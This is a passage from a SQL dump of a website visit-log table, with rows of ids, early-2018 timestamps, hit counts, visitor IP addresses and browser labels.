1,1,0,0,'164.132.162.164','other'),(204481,1517410817,1,1,0,0,'91.209.11.236','other'),(204482,1517411295,1,1,0,0,'217.69.133.245','other'),(204483,1517411340,1,0,1,0,'66.249.64.13',''),(204484,1517411369,1,1,0,0,'37.9.113.134','other'),(204485,1517411372,1,1,0,0,'54.36.149.3','other'),(204486,1517411373,1,1,0,0,'37.9.113.138','other'),(204487,1517411489,1,1,0,0,'91.196.178.100','chrome'),(204488,1517411672,1,1,0,0,'51.255.71.110','other'),(204489,1517411718,1,1,0,0,'91.196.177.46','chrome'),(204490,1517411814,1,1,0,0,'82.145.221.128','chrome'),(204491,1517411822,3,3,0,0,'216.244.66.246','other'),(204492,1517411869,1,1,0,0,'54.36.149.52','other'),(204493,1517411955,1,1,0,0,'54.36.148.85','other'),(204494,1517412100,1,1,0,0,'188.230.43.254','other'),(204495,1517412825,1,1,0,0,'51.255.71.133','other'),(204496,1517413174,1,1,0,0,'91.196.178.168','chrome'),(204497,1517413178,1,1,0,0,'37.9.113.134','other'),(204498,1517413268,2,2,0,0,'216.244.66.194','other'),(204499,1517413885,1,1,0,0,'62.80.185.138','chrome'),(204500,1517414510,1,1,0,0,'188.230.43.254','other'),(204501,1517414994,1,1,0,0,'62.80.185.138','chrome'),(204502,1517415367,1,1,0,0,'87.250.224.46','other'),(204503,1517416068,1,0,1,0,'66.249.64.13',''),(204504,1517416189,1,1,0,0,'91.209.11.236','other'),(204505,1517416419,1,1,0,0,'54.36.149.90','other'),(204506,1517416671,1,0,1,0,'66.249.64.73',''),(204507,1517416730,1,1,0,0,'54.36.148.17','other'),(204508,1517416752,1,1,0,0,'216.244.66.246','other'),(204509,1517417007,1,1,0,0,'188.230.43.254','other'),(204510,1517417447,1,1,0,0,'54.36.148.117','other'),(204511,1517417884,1,1,0,0,'91.196.178.68','firefox'),(204512,1517418682,1,1,0,0,'157.55.39.88','other'),(204513,1517418833,4,4,0,0,'216.244.66.194','other'),(204514,1517418906,1,0,1,0,'68.180.229.52',''),(204515,1517418958,1,0,1,0,'66.249.64.71',''),(204516,1517419148,1,1,0,0,'91.196.178.168','chrome'),(204517,1517419287,1,1,0,0,'207.46.13.142','other'),(204518,1517419300,1,1,0,0,'188.230.43.254','other'),(204519,1517419377,1,1,0,0,'51.255.71.117','other'),(204520,1517419574,1,1,0,0,'137.74.201.100','other'),(204521,1517419583,1,1,0,0,'217.69.133.68','other'),(204522,1517419729,1,1,0,0,'54.36.149.85','other'),(204523,1517419976,1,1,0,0,'51.255.71.129','other'),(204524,1517420151,1,1,0,0,'178.154.171.88','other'),(204525,1517420508,1,1,0,0,'8.29.198.26','other'),(204526,1517420979,1,1,0,0,'51.255.71.128','other'),(204527,1517421709,1,1,0,0,'188.230.43.254','other'),(204528,1517421717,2,2,0,0,'91.209.11.236','other'),(204529,1517421742,4,4,0,0,'216.244.66.246','other'),(204530,1517421833,1,0,1,0,'68.180.229.52',''),(204531,1517422369,1,1,0,0,'141.8.142.74','other'),(204532,1517422420,1,1,0,0,'137.74.207.102','other'),(204533,1517422619,1,1,0,0,'178.154.171.88','other'),(204534,1517422664,1,1,0,0,'54.36.149.5','other'),(204535,1517423107,1,1,0,0,'54.36.148.85','other'),(204536,1517423214,1,1,0,0,'137.74.207.108','other'),(204537,1517423613,4,4,0,0,'216.244.66.194','other'),(204538,1517424079,1,0,1,0,'66.249.64.13',''),(204539,1517424196,1,1,0,0,'216.244.66.237','other'),(204540,1517424604,1,1,0,0,'54.36.149.97','other'),(204541,1517424657,1,1,0,0,'54.36.149.90','other'),(204542,1517424674,1,1,0,0,'141.8.142.74','other'),(204543,1517424835,1,1,0,0,'51.255.71.123','other'),(204544,1517424893,1,1,0,0,'207.46.13.144','other'),(204545,1517425082,2,2,0,0,'91.209.11.236','other'),(204546,1517425339,2,2,0,0,'54.36.148.70','other'),(204547,1517425458,1,1,0,0,'91.196.178.163','chrome'),(204548,1517425524,1,0,1,0,'66.249.64.14',''),(204549,1517425697,4,4,0,0,'216.244.66.246','other'),(204550,1517426192,1,1,0,0,'137.74.203.194','other'),(204551,1517426488,1,1,0,0,'37.73.235.224','chrome'),(204552,1517426985,1,1,0,0,'157.55.39.88','other'),(204553,1517427458,2,2,0,0,'77.111.244.38','chrome'),(204554,1517427784,1,1,0,0,'54.36.148.42','other'),(204555,1517427959,1,1,0,0,'37.73.235.224','chrome'),(204556,1517428364,1,1,0,0,'87.250.224.125','other'),(204557,1517428380,1,1,0,0,'54.36.148.139','other'),(204558,1517428597,1,1,0,0,'207.46.13.178','other'),(204559,1517428673,2,2,0,0,'91.209.11.236','other'),(204560,1517428723,1,1,0,0,'178.154.171.60','other'),(204561,1517429084,1,1,0,0,'207.46.13.142','other'),(204562,1517429123,3,3,0,0,'216.244.66.194','other'),(204563,1517429175,1,1,0,0,'137.74.201.108','other'),(204564,1517429772,1,1,0,0,'51.255.71.126','other'),(204565,1517430003,1,0,1,0,'66.249.64.71',''),(204566,1517430133,1,1,0,0,'54.36.148.243','other'),(204567,1517430715,1,1,0,0,'13.56.229.65','chrome'),(204568,1517430778,1,1,0,0,'54.36.149.13','other'),(204569,1517431046,1,1,0,0,'157.55.39.88','other'),(204570,1517431201,1,1,0,0,'54.36.148.235','other'),(204571,1517431343,1,1,0,0,'8.29.198.25','other'),(204572,1517431864,1,1,0,0,'54.36.149.14','other'),(204573,1517431879,1,1,0,0,'141.8.132.22','other'),(204574,1517432143,1,1,0,0,'54.36.149.44','other'),(204575,1517432265,3,3,0,0,'216.244.66.246','other'),(204576,1517432400,1,1,0,0,'54.36.148.250','other'),(204577,1517432869,1,1,0,0,'54.36.148.251','other'),(204578,1517433184,1,1,0,0,'185.200.214.55','firefox'),(204579,1517433291,1,1,0,0,'216.244.66.194','other'),(204580,1517433313,1,1,0,0,'37.9.113.134','other'),(204581,1517434205,1,1,0,0,'5.45.207.82','other'),(204582,1517435042,1,1,0,0,'91.209.11.236','other'),(204583,1517435286,6,6,0,0,'216.244.66.246','other'),(204584,1517435342,1,1,0,0,'178.154.171.60','other'),(204585,1517435529,1,1,0,0,'54.36.148.244','other'),(204586,1517435611,1,1,0,0,'95.132.58.173','chrome'),(204587,1517435664,2,2,0,0,'108.59.8.70','other'),(204588,1517435915,1,1,0,0,'51.255.71.129','other'),(204589,1517436637,1,1,0,0,'95.132.58.173','chrome'),(204590,1517436789,1,1,0,0,'54.36.149.78','other'),(204591,1517437071,1,0,1,0,'66.249.64.71',''),(204592,1517437214,1,1,0,0,'157.55.39.88','other'),(204593,1517438543,1,1,0,0,'51.255.71.129','other'),(204594,1517438988,2,2,0,0,'216.244.66.194','other'),(204595,1517439516,1,1,0,0,'207.46.13.144','other'),(204596,1517439759,18,18,0,0,'173.249.2.90','other'),(204597,1517439937,1,1,0,0,'54.36.148.102','other'),(204598,1517440016,1,1,0,0,'35.153.67.216','other'),(204599,1517440120,1,1,0,0,'51.255.71.129','other'),(204600,1517440445,1,1,0,0,'91.196.178.162','chrome'),(204601,1517440937,1,1,0,0,'35.153.67.216','other'),(204602,1517441382,1,1,0,0,'66.249.64.15','chrome'),(204603,1517441640,1,1,0,0,'178.154.200.7','other'),(204604,1517442025,1,1,0,0,'35.153.67.216','other'),(204605,1517442115,1,1,0,0,'66.249.64.73','chrome'),(204606,1517442167,1,1,0,0,'8.29.198.26','other'),(204607,1517442226,1,1,0,0,'51.255.71.119','other'),(204608,1517442530,1,1,0,0,'54.36.148.85','other'),(204609,1517442659,1,1,0,0,'5.45.207.58','other'),(204610,1517442934,1,1,0,0,'35.153.67.216','other'),(204611,1517443018,2,2,0,0,'216.244.66.194','other'),(204612,1517443037,3,3,0,0,'216.244.66.246','other'),(204613,1517443823,2,2,0,0,'208.110.93.78','other'),(204614,1517443872,1,1,0,0,'35.153.67.216','other'),(204615,1517443947,1,0,1,0,'66.249.64.67',''),(204616,1517444056,2,2,0,0,'91.209.11.236','other'),(204617,1517444445,1,0,1,0,'66.249.64.15',''),(204618,1517444543,1,1,0,0,'141.8.142.74','other'),(204619,1517444750,1,1,0,0,'54.36.148.117','other'),(204620,1517444920,1,1,0,0,'35.153.67.216','other'),(204621,1517445160,1,0,1,0,'66.249.64.67',''),(204622,1517445593,3,3,0,0,'216.244.66.246','other'),(204623,1517445897,1,1,0,0,'54.36.148.63','other'),(204624,1517446077,1,1,0,0,'35.153.67.216','other'),(204625,1517446180,1,1,0,0,'217.69.136.209','other'),(204626,1517446927,1,1,0,0,'54.36.149.26','other'),(204627,1517447009,1,1,0,0,'217.69.133.70','other'),(204628,1517447124,1,1,0,0,'35.153.67.216','other'),(204629,1517447444,1,1,0,0,'217.69.133.67','other'),(204630,1517447740,5,5,0,0,'95.91.13.15','other'),(204631,1517447744,2,2,0,0,'91.137.19.234','other'),(204632,1517447893,1,1,0,0,'51.255.71.111','other'),(204633,1517447922,1,1,0,0,'74.115.214.144','other'),(204634,1517447943,1,1,0,0,'54.36.148.250','other'),(204635,1517448045,1,1,0,0,'35.153.67.216','other'),(204636,1517448354,1,1,0,0,'54.36.149.40','other'),(204637,1517448983,1,1,0,0,'35.153.67.216','other'),(204638,1517449477,1,1,0,0,'91.209.11.236','other'),(204639,1517449541,5,5,0,0,'216.244.66.194','other'),(204640,1517449892,1,1,0,0,'35.153.67.216','other'),(204641,1517450894,1,1,0,0,'35.153.67.216','other'),(204642,1517451206,1,1,0,0,'54.36.148.17','other'),(204643,1517451529,1,0,1,0,'66.249.64.73',''),(204644,1517451542,1,1,0,0,'40.77.167.33','other'),(204645,1517451575,1,0,1,0,'66.249.64.71',''),(204646,1517451862,1,1,0,0,'91.209.11.236','other'),(204647,1517452278,1,1,0,0,'54.36.148.101','other'),(204648,1517452694,1,1,0,0,'216.244.66.246','other'),(204649,1517452753,1,1,0,0,'35.153.67.216','other'),(204650,1517452998,1,1,0,0,'8.29.198.25','other'),(204651,1517453155,1,1,0,0,'5.255.253.35','other'),(204652,1517453270,1,1,0,0,'40.77.167.130','other'),(204653,1517453281,1,1,0,0,'37.9.113.60','other'),(204654,1517453592,1,1,0,0,'51.255.71.98','other'),(204655,1517454205,1,1,0,0,'35.153.67.216','other'),(204656,1517454699,1,1,0,0,'51.255.71.116','other'),(204657,1517454984,1,0,1,0,'66.249.64.73',''),(204658,1517455040,1,0,1,0,'66.249.64.87',''),(204659,1517455049,1,0,1,0,'66.249.64.15',''),(204660,1517455094,2,0,2,0,'66.249.64.13',''),(204661,1517455531,1,1,0,0,'35.153.67.216','other'),(204662,1517456502,1,1,0,0,'37.9.113.207','other'),(204663,1517456613,1,1,0,0,'37.9.113.157','other'),(204664,1517456804,1,1,0,0,'51.255.71.120','other'),(204665,1517456845,1,1,0,0,'35.153.67.216','other'),(204666,1517456895,1,1,0,0,'54.36.148.101','other'),(204667,1517456904,1,1,0,0,'54.36.148.253','other'),(204668,1517457093,1,1,0,0,'216.244.66.246','other'),(204669,1517457105,1,0,1,0,'66.249.64.15',''),(204670,1517457114,2,0,2,0,'66.249.64.73',''),(204671,1517457162,2,0,2,0,'66.249.64.71',''),(204672,1517457163,1,0,1,0,'66.249.64.13',''),(204673,1517457190,3,1,2,0,'66.249.64.67',''),(204674,1517457313,2,2,0,0,'176.88.18.212','other'),(204675,1517458210,1,1,0,0,'157.55.39.67','other'),(204676,1517458353,1,1,0,0,'35.153.67.216','other'),(204677,1517458846,2,2,0,0,'216.244.66.194','other'),(204678,1517458918,1,1,0,0,'217.69.133.219','other'),(204679,1517458945,2,2,0,0,'176.88.18.212','other'),(204680,1517459069,1,0,1,0,'66.249.64.67',''),(204681,1517459254,1,1,0,0,'35.153.67.216','other'),(204682,1517459472,1,1,0,0,'157.55.39.67','other'),(204683,1517460196,1,1,0,0,'35.153.67.216','other'),(204684,1517460248,1,1,0,0,'157.55.39.145','other'),(204685,1517460563,1,0,1,0,'66.249.64.14',''),(204686,1517461159,1,1,0,0,'217.69.133.59','other'),(204687,1517461228,2,2,0,0,'176.88.18.212','other'),(204688,1517461406,1,1,0,0,'95.221.208.144','msie'),(204689,1517462109,2,2,0,0,'216.244.66.246','other'),(204690,1517462591,1,1,0,0,'35.153.67.216','other'),(204691,1517462593,1,1,0,0,'5.45.207.30','other'),(204692,1517462780,5,5,0,0,'216.244.66.194','other'),(204693,1517463543,1,1,0,0,'66.249.64.73','chrome'),(204694,1517463838,1,1,0,0,'8.29.198.26','other'),(204695,1517465281,1,1,0,0,'141.8.132.19','other'),(204696,1517466201,1,1,0,0,'35.153.67.216','other'),(204697,1517466263,1,1,0,0,'212.111.198.100','chrome'),(204698,1517466407,1,1,0,0,'188.230.43.254','other'),(204699,1517466958,2,2,0,0,'216.244.66.246','other'),(204700,1517467143,1,1,0,0,'35.153.67.216','other'),(204701,1517467792,1,1,0,0,'54.36.148.192','other'),(204702,1517467814,1,1,0,0,'91.209.11.236','other'),(204703,1517467832,1,1,0,0,'54.36.148.139','other'),(204704,1517467988,1,0,1,0,'66.249.64.67',''),(204705,1517468078,1,1,0,0,'35.153.67.216','other'),(204706,1517468324,1,1,0,0,'54.36.148.231','other'),(204707,1517468478,2,2,0,0,'216.244.66.194','other'),(204708,1517468511,1,1,0,0,'91.196.178.50','chrome'),(204709,1517468622,1,1,0,0,'5.45.207.12','other'),(204710,1517469028,1,1,0,0,'35.153.67.216','other'),(204711,1517469162,1,1,0,0,'130.180.220.234','chrome'),(204712,1517469407,1,0,1,0,'66.249.64.13',''),(204713,1517469420,3,0,3,0,'66.249.64.71',''),(204714,1517469539,1,1,0,0,'91.196.178.166','chrome'),(204715,1517469625,1,1,0,0,'91.209.11.236','other'),(204716,1517469805,1,1,0,0,'37.9.113.186','other'),(204717,1517469874,1,1,0,0,'91.196.178.76','chrome'),(204718,1517469935,1,1,0,0,'35.153.67.216','other'),(204719,1517470507,1,1,0,0,'107.167.106.173','other'),(204720,1517470678,2,0,2,0,'66.249.64.67',''),(204721,1517470853,1,1,0,0,'35.153.67.216','other'),(204722,1517471221,3,0,3,0,'66.249.64.71',''),(204723,1517471249,1,0,1,0,'66.249.64.14',''),(204724,1517471755,1,1,0,0,'35.153.67.216','other'),(204725,1517471978,3,3,0,0,'216.244.66.194','other'),(204726,1517472000,3,3,0,0,'216.244.66.246','other'),(204727,1517472033,1,1,0,0,'37.9.113.186','other'),(204728,1517472096,63,63,0,0,'46.4.91.109','other'),(204729,1517472542,1,1,0,0,'195.230.119.34','chrome'),(204730,1517472678,1,1,0,0,'35.153.67.216','other'),(204731,1517472695,1,1,0,0,'91.196.178.72','chrome'),(204732,1517473156,1,1,0,0,'91.196.178.76','chrome'),(204733,1517473176,1,0,1,0,'66.249.64.14',''),(204734,1517473185,1,1,0,0,'66.249.64.14','chrome'),(204735,1517473289,1,0,1,0,'66.249.64.71',''),(204736,1517473330,1,0,1,0,'66.249.64.73',''),(204737,1517473364,1,0,1,0,'66.249.64.67',''),(204738,1517473408,1,1,0,0,'91.196.178.103','firefox'),(204739,1517473625,1,1,0,0,'35.153.67.216','other'),(204740,1517474556,1,1,0,0,'35.153.67.216','other'),(204741,1517474667,1,1,0,0,'8.29.198.27','other'),(204742,1517474727,2,0,2,0,'66.249.64.71',''),(204743,1517474764,1,0,1,0,'66.249.64.73',''),(204744,1517474959,1,1,0,0,'91.209.11.236','other'),(204745,1517475366,1,1,0,0,'91.196.178.76','chrome'),(204746,1517475479,1,1,0,0,'35.153.67.216','other'),(204747,1517475709,1,1,0,0,'178.93.32.46','chrome'),(204748,1517475774,1,1,0,0,'91.196.177.46','chrome'),(204749,1517475904,2,0,2,0,'66.249.64.73',''),(204750,1517476324,3,3,0,0,'216.244.66.246','other'),(204751,1517476406,1,1,0,0,'35.153.67.216','other'),(204752,1517476851,1,0,1,0,'66.249.64.73',''),(204753,1517476908,1,1,0,0,'82.207.49.98','chrome'),(204754,1517476992,1,0,1,0,'66.249.64.13',''),(204755,1517477329,1,1,0,0,'91.209.11.236','other'),(204756,1517477356,1,1,0,0,'35.153.67.216','other'),(204757,1517477516,1,1,0,0,'37.9.113.63','other'),(204758,1517478267,1,1,0,0,'35.153.67.216','other'),(204759,1517478278,1,1,0,0,'91.196.178.76','chrome'),(204760,1517478517,1,1,0,0,'82.207.49.98','chrome'),(204761,1517478564,1,1,0,0,'91.196.177.46','chrome'),(204762,1517478802,1,1,0,0,'216.244.66.194','other'),(204763,1517478889,1,0,1,0,'66.249.64.73',''),(204764,1517479087,1,0,1,0,'66.249.64.67',''),(204765,1517479307,1,1,0,0,'77.90.241.234','other'),(204766,1517479414,79,79,0,0,'5.9.89.170','other'),(204767,1517480000,1,1,0,0,'91.196.177.46','chrome'),(204768,1517480128,1,1,0,0,'35.153.67.216','other'),(204769,1517480371,1,1,0,0,'91.209.11.236','other'),(204770,1517480396,1,1,0,0,'91.196.178.80','firefox'),(204771,1517480619,1,0,1,0,'66.249.64.67',''),(204772,1517480626,1,1,0,0,'91.124.118.154','chrome'),(204773,1517480676,2,1,1,0,'66.249.64.71',''),(204774,1517480740,1,1,0,0,'141.8.142.123','other'),(204775,1517480741,1,1,0,0,'66.249.64.71','chrome'),(204776,1517480779,1,0,1,0,'66.249.64.14',''),(204777,1517481101,1,1,0,0,'37.9.113.207','other'),(204778,1517481150,2,2,0,0,'91.196.178.164','chrome'),(204779,1517481242,2,2,0,0,'176.98.69.250','chrome'),(204780,1517481338,1,1,0,0,'35.153.67.216','other'),(204781,1517481543,1,1,0,0,'95.108.181.102','other'),(204782,1517481591,2,2,0,0,'216.244.66.246','other'),(204783,1517482251,1,1,0,0,'35.153.67.216','other'),(204784,1517482301,1,1,0,0,'46.242.127.167','msie'),(204785,1517482490,3,3,0,0,'216.244.66.194','other'),(204786,1517482669,1,0,1,0,'66.249.64.67',''),(204787,1517482771,1,1,0,0,'91.196.178.80','firefox'),(204788,1517482961,1,1,0,0,'91.196.177.15','chrome'),(204789,1517483686,1,1,0,0,'35.153.67.216','other'),(204790,1517483875,1,1,0,0,'40.77.167.101','other'),(204791,1517484389,1,1,0,0,'18.216.55.58','chrome'),(204792,1517484468,1,1,0,0,'91.209.11.236','other'),(204793,1517484615,1,1,0,0,'35.153.67.216','other'),(204794,1517485038,1,0,1,0,'66.249.64.14',''),(204795,1517485491,1,1,0,0,'8.29.198.25','other'),(204796,1517485538,1,1,0,0,'35.153.67.216','other'),(204797,1517485746,1,1,0,0,'46.133.199.181','chrome'),(204798,1517485810,2,2,0,0,'91.196.178.165','chrome'),(204799,1517486448,1,1,0,0,'35.153.67.216','other'),(204800,1517486470,3,3,0,0,'216.244.66.246','other'),(204801,1517486556,1,0,1,0,'66.249.64.67',''),(204802,1517486688,1,1,0,0,'217.69.133.239','other'),(204803,1517486951,1,1,0,0,'77.111.244.35','chrome'),(204804,1517487702,2,2,0,0,'91.196.177.46','chrome'),(204805,1517487773,3,0,3,0,'66.249.64.67',''),(204806,1517487786,1,1,0,0,'35.153.67.216','other'),(204807,1517487841,1,0,1,0,'66.249.64.14',''),(204808,1517487941,1,1,0,0,'91.196.178.136','firefox'),(204809,1517488057,1,1,0,0,'40.77.167.194','other'),(204810,1517488390,3,3,0,0,'216.244.66.194','other'),(204811,1517488512,1,1,0,0,'91.196.178.76','chrome'),(204812,1517488636,1,1,0,0,'188.190.0.194','chrome'),(204813,1517488643,1,1,0,0,'141.8.132.19','other'),(204814,1517488656,1,0,1,0,'66.249.64.71',''),(204815,1517488695,1,1,0,0,'35.153.67.216','other'),(204816,1517488961,7,7,0,0,'5.189.153.71','other'),(204817,1517489120,2,0,2,0,'66.249.64.67',''),(204818,1517489256,1,1,0,0,'91.196.179.33','chrome'),(204819,1517489308,1,0,1,0,'66.249.64.14',''),(204820,1517490014,2,2,0,0,'176.88.18.212','other'),(204821,1517490162,1,1,0,0,'178.154.200.7','other'),(204822,1517490203,1,1,0,0,'46.211.158.236','chrome'),(204823,1517491008,1,1,0,0,'91.196.177.46','chrome'),(204824,1517491033,1,1,0,0,'54.36.148.117','other'),(204825,1517491054,1,1,0,0,'35.153.67.216','other'),(204826,1517491068,1,0,1,0,'66.249.64.67',''),(204827,1517491166,1,1,0,0,'66.249.64.13','chrome'),(204828,1517491324,2,2,0,0,'216.244.66.246','other'),(204829,1517491329,1,1,0,0,'54.36.149.8','other'),(204830,1517491464,1,1,0,0,'178.92.138.205','chrome'),(204831,1517491469,8,8,0,0,'216.244.66.194','other'),(204832,1517491479,1,1,0,0,'37.9.113.115','other'),(204833,1517491761,1,1,0,0,'54.36.148.253','other'),(204834,1517491788,2,2,0,0,'40.77.167.99','other'),(204835,1517491916,1,1,0,0,'54.36.148.251','other'),(204836,1517491918,1,1,0,0,'141.8.142.126','other'),(204837,1517491943,1,1,0,0,'91.196.178.136','firefox'),(204838,1517491982,1,1,0,0,'35.153.67.216','other'),(204839,1517492209,1,1,0,0,'91.232.158.16','opera'),(204840,1517492262,1,1,0,0,'185.5.249.252','firefox'),(204841,1517492819,1,1,0,0,'95.132.14.237','chrome'),(204842,1517492883,1,1,0,0,'35.153.67.216','other'),(204843,1517492943,1,1,0,0,'91.196.178.72','chrome'),(204844,1517493081,1,1,0,0,'95.132.6.79','chrome'),(204845,1517493117,1,1,0,0,'178.94.22.86','chrome'),(204846,1517493144,2,1,1,0,'66.249.64.73',''),(204847,1517493223,1,0,1,0,'66.249.64.71',''),(204848,1517493327,1,0,1,0,'66.249.64.67',''),(204849,1517493383,1,1,0,0,'164.132.162.158','other'),(204850,1517493436,1,1,0,0,'40.77.167.99','other'),(204851,1517493504,2,1,1,0,'66.249.64.73',''),(204852,1517494051,1,1,0,0,'35.153.67.216','other'),(204853,1517494282,1,1,0,0,'40.77.167.194','other'),(204854,1517494575,1,1,0,0,'164.132.164.180','other'),(204855,1517494703,1,1,0,0,'91.124.118.154','chrome'),(204856,1517494738,1,0,1,0,'66.249.64.67',''),(204857,1517494768,1,1,0,0,'54.36.148.109','other'),(204858,1517494835,1,0,1,0,'66.249.64.14',''),(204859,1517495193,1,1,0,0,'35.153.67.216','other'),(204860,1517495222,1,1,0,0,'94.178.105.104','firefox'),(204861,1517495271,1,1,0,0,'91.196.178.136','firefox'),(204862,1517495617,1,0,1,0,'66.249.64.71',''),(204863,1517495820,2,2,0,0,'95.132.6.79','chrome'),(204864,1517495873,1,1,0,0,'91.196.179.33','chrome'),(204865,1517495910,1,0,1,0,'66.249.64.67',''),(204866,1517495950,1,1,0,0,'141.8.142.74','other'),(204867,1517496322,1,1,0,0,'8.29.198.26','other'),(204868,1517496477,1,0,1,0,'66.249.64.13',''),(204869,1517496813,1,1,0,0,'66.249.64.67','chrome'),(204870,1517496856,2,2,0,0,'66.249.64.71','chrome'),(204871,1517496919,3,3,0,0,'216.244.66.246','other'),(204872,1517497143,1,1,0,0,'178.93.33.201','chrome'),(204873,1517497169,2,2,0,0,'91.196.178.76','chrome'),(204874,1517497446,7,7,0,0,'158.69.252.176','other'),(204875,1517498764,1,1,0,0,'51.255.71.100','other'),(204876,1517499108,2,2,0,0,'216.244.66.194','other'),(204877,1517499970,1,0,1,0,'66.249.64.73',''),(204878,1517500147,1,0,1,0,'66.249.64.15',''),(204879,1517500177,1,1,0,0,'91.196.178.168','chrome'),(204880,1517500207,1,1,0,0,'188.230.43.254','other'),(204881,1517500324,1,1,0,0,'87.250.224.77','other'),(204882,1517501001,1,1,0,0,'109.173.110.80','firefox'),(204883,1517501364,2,2,0,0,'194.44.219.102','chrome'),(204884,1517501390,1,1,0,0,'216.244.66.246','other'),(204885,1517501457,1,1,0,0,'149.154.167.167','other'),(204886,1517501555,1,1,0,0,'40.77.167.194','other'),(204887,1517501782,1,1,0,0,'217.69.133.72','other'),(204888,1517501790,1,1,0,0,'212.33.255.53','other'),(204889,1517501791,1,1,0,0,'212.33.255.53','msie'),(204890,1517502161,5,5,0,0,'216.244.66.194','other'),(204891,1517502186,2,2,0,0,'162.210.196.97','other'),(204892,1517502608,1,1,0,0,'188.230.43.254','other'),(204893,1517503278,1,1,0,0,'188.166.26.63','chrome'),(204894,1517503299,1,1,0,0,'194.183.183.82','chrome'),(204895,1517503529,1,1,0,0,'37.9.113.186','other'),(204896,1517503951,1,0,1,0,'66.249.64.73',''),(204897,1517504444,1,1,0,0,'91.196.178.12','chrome'),(204898,1517504930,1,1,0,0,'54.36.149.5','other'),(204899,1517504945,1,1,0,0,'5.45.207.82','other'),(204900,1517505050,1,1,0,0,'188.230.43.254','other'),(204901,1517505160,1,0,1,0,'66.249.64.67',''),(204902,1517505406,1,1,0,0,'91.196.178.90','chrome'),(204903,1517505585,1,1,0,0,'51.255.71.117','other'),(204904,1517505617,1,0,1,0,'66.249.64.73',''),(204905,1517505729,1,1,0,0,'91.196.178.85','firefox'),(204906,1517506674,1,0,1,0,'66.249.64.67',''),(204907,1517506980,2,2,0,0,'216.244.66.246','other'),(204908,1517507153,1,1,0,0,'8.29.198.25','other'),(204909,1517507401,1,1,0,0,'54.36.148.43','other'),(204910,1517507407,1,1,0,0,'188.230.43.254','other'),(204911,1517507478,1,1,0,0,'91.196.178.49','chrome'),(204912,1517508054,1,1,0,0,'37.54.18.4','chrome'),(204913,1517508370,6,6,0,0,'216.244.66.194','other'),(204914,1517509180,1,1,0,0,'37.54.18.4','chrome'),(204915,1517509421,1,0,1,0,'66.249.64.71',''),(204916,1517509533,1,1,0,0,'54.36.149.14','other'),(204917,1517509654,1,1,0,0,'88.198.23.179','other'),(204918,1517509729,1,1,0,0,'54.36.149.5','other'),(204919,1517509768,1,1,0,0,'51.255.71.118','other'),(204920,1517509830,1,0,1,0,'66.249.64.13',''),(204921,1517509960,1,1,0,0,'92.113.191.54','chrome'),(204922,1517511544,1,1,0,0,'92.113.157.52','chrome'),(204923,1517511650,1,1,0,0,'54.36.148.17','other'),(204924,1517511888,1,0,1,0,'66.249.64.13',''),(204925,1517511994,1,1,0,0,'35.153.67.216','other'),(204926,1517512023,1,1,0,0,'37.9.113.182','other'),(204927,1517512246,1,1,0,0,'165.227.129.30','chrome'),(204928,1517512318,1,1,0,0,'91.196.178.161','chrome'),(204929,1517512346,2,2,0,0,'216.244.66.246','other'),(204930,1517512466,1,1,0,0,'92.113.157.52','chrome'),(204931,1517513074,1,0,1,0,'66.249.64.73',''),(204932,1517513121,1,0,1,0,'66.249.64.14',''),(204933,1517513222,4,4,0,0,'216.244.66.194','other'),(204934,1517513959,1,1,0,0,'40.77.167.13','other'),(204935,1517514607,1,1,0,0,'128.68.25.7','chrome'),(204936,1517514975,1,1,0,0,'54.36.149.13','other'),(204937,1517515035,1,1,0,0,'54.36.148.197','other'),(204938,1517515145,1,1,0,0,'37.9.113.110','other'),(204939,1517515723,1,0,1,0,'66.249.64.73',''),(204940,1517516061,1,1,0,0,'91.209.11.236','other'),(204941,1517516565,1,1,0,0,'54.36.149.44','other'),(204942,1517516919,1,0,1,0,'66.249.64.73',''),(204943,1517517126,1,0,1,0,'66.249.64.67',''),(204944,1517517274,5,5,0,0,'216.244.66.246','other'),(204945,1517517293,1,1,0,0,'137.74.207.188','other'),(204946,1517517345,1,1,0,0,'35.153.67.216','other'),(204947,1517517793,1,1,0,0,'164.132.162.153','other'),(204948,1517517801,1,1,0,0,'51.255.71.101','other'),(204949,1517517987,1,1,0,0,'8.29.198.26','other'),(204950,1517518221,5,5,0,0,'216.244.66.194','other'),(204951,1517518361,1,1,0,0,'35.153.194.0','other'),(204952,1517518613,1,1,0,0,'188.230.43.254','other'),(204953,1517518638,1,1,0,0,'51.255.71.127','other'),(204954,1517518849,1,1,0,0,'66.249.64.67','chrome'),(204955,1517519249,1,1,0,0,'40.77.167.66','other'),(204956,1517519268,1,1,0,0,'35.153.194.0','other'),(204957,1517519497,1,0,1,0,'66.249.64.73',''),(204958,1517519804,1,1,0,0,'217.69.133.235','other'),(204959,1517519865,1,1,0,0,'216.244.66.237','other'),(204960,1517519912,1,1,0,0,'173.208.157.186','other'),(204961,1517520168,1,1,0,0,'54.36.148.167','other'),(204962,1517520240,1,1,0,0,'66.249.64.15','chrome'),(204963,1517520241,1,1,0,0,'35.153.194.0','other'),(204964,1517520242,1,1,0,0,'37.9.113.157','other'),(204965,1517520363,1,0,1,0,'66.249.64.71',''),(204966,1517520452,1,1,0,0,'51.255.71.122','other'),(204967,1517520852,1,1,0,0,'137.74.201.100','other'),(204968,1517521009,1,1,0,0,'91.200.12.21','chrome'),(204969,1517521157,1,1,0,0,'137.74.201.99','other'),(204970,1517521180,1,1,0,0,'54.36.149.61','other'),(204971,1517521486,1,1,0,0,'40.77.167.66','other'),(204972,1517521840,7,7,0,0,'216.244.66.246','other'),(204973,1517521989,1,1,0,0,'217.69.133.191','other'),(204974,1517522139,1,0,1,0,'66.249.64.73',''),(204975,1517522842,2,2,0,0,'216.244.66.194','other'),(204976,1517523141,1,1,0,0,'51.255.71.116','other'),(204977,1517523188,1,1,0,0,'151.80.27.118','other'),(204978,1517523618,1,1,0,0,'51.255.71.98','other'),(204979,1517523846,1,1,0,0,'54.36.148.16','other'),(204980,1517523941,1,1,0,0,'178.154.171.88','other'),(204981,1517524075,1,1,0,0,'220.181.132.178','chrome'),(204982,1517524104,1,1,0,0,'106.120.162.96','chrome'),(204983,1517524154,1,1,0,0,'137.74.201.100','other'),(204984,1517524386,1,1,0,0,'54.36.148.198','other'),(204985,1517524424,1,1,0,0,'51.255.71.122','other'),(204986,1517525286,1,1,0,0,'35.153.67.216','other'),(204987,1517525511,1,1,0,0,'51.255.71.114','other'),(204988,1517525766,3,0,3,0,'66.249.64.71',''),(204989,1517526344,1,1,0,0,'178.154.200.7','other'),(204990,1517526449,1,0,1,0,'66.249.64.73',''),(204991,1517526624,1,1,0,0,'216.244.66.246','other'),(204992,1517527002,1,1,0,0,'213.180.203.40','other'),(204993,1517527166,1,1,0,0,'54.36